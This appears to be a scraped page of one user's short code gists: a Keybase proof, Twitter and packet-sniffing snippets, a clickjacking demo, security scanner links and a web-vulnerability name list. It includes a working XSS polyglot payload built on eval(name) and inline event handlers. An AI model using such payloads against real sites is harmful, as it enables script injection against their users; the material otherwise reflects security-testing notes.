| ### Keybase proof | |
| I hereby claim: | |
| * I am mccabe615 on github. | |
| * I am mccabe615 (https://keybase.io/mccabe615) on keybase. | |
| * I have a public key whose fingerprint is 4FDF 4990 E6CB 5653 6E7B 1C8C 8A0B 8989 A235 A444 | |
| To claim this, I am signing this object: |
| #!/usr/bin/env ruby | |
| require 'rubygems' | |
| require 'twitter' | |
| #register here: https://apps.twitter.com/ | |
| #add your info here | |
| client = Twitter::REST::Client.new do |config| | |
| config.consumer_key = "consumer key" | |
| config.consumer_secret = "consumer secret" |
| package main | |
| import ( | |
| "fmt" | |
| "log" | |
| "github.com/google/gopacket/pcap" | |
| ) | |
| func main() { |
| package main | |
| import ( | |
| "fmt" | |
| "log" | |
| "time" | |
| "github.com/google/gopacket" | |
| "github.com/google/gopacket/layers" | |
| "github.com/google/gopacket/pcap" |
| from scapy.all import * | |
| def arp_display(pkt): | |
| if pkt[ARP].hwsrc == '74:75:48:0f:76:3a': # Huggies | |
| print "Found Dash" | |
| print sniff(prn=arp_display, filter="arp", store=0, count=1000) |
XSS
" onlick=alert(1)//<button ' onclick=alert(1)//> *alert(1)//"
javascript:/*-- >]]>%>?></script></title></textarea></noscript></style></xmp>">
[img=1,name=/alert(1)/.source]<img - /style=a:expression(/*'/- /*',/**/eval(name)/*%2A///*///);width:100%;height:100%;p
osition:absolute;-ms-behavior:url(#default#time2) name=alert(1)
onerror=eval(name) src=1 autofocus onfocus=eval(name)
onclick=eval(name) onmouseover=eval(name) onbegin=eval(name)
| asp,aspx,php,php3,php4,php5,txt,shtm,shtml,phtm,phtml,jhtml,pl,jsp,cfm,cfml,py,rb,cfg,zip,pdf,gz,tar,tar.gz,tgz,doc,docx,xls,xlsx,conf, |
| Brakeman - Rails source code analysis - http://brakemanscanner.org/ | |
| Bundler-audit - Looks for out of date or vulnerable JS libraries - https://github.com/rubysec/bundler-audit | |
| Retire.js - Looks for out of date or vulnerable JS libraries - http://retirejs.github.io/retire.js/ | |
| ScanJS - Basic JS source code scanner - https://github.com/mozilla/scanjs |
| <head> | |
| <p>ClickJacking Demo<p/> | |
| <p>This site has been clickjacked!<p/> | |
| <style> | |
| @charset "utf-8"; | |
| body { | |
| margin: 0px; | |
| padding: 0px; | |
| } |
Ajax request header manipulation (DOM-based) ASP.NET debugging enabled ASP.NET tracing enabled ASP.NET ViewState without MAC enabled Base-encoded data in parameter Browser cross-site scripting filter disabled Cacheable HTTPS response Cleartext submission of password Client-side JSON injection (DOM-based)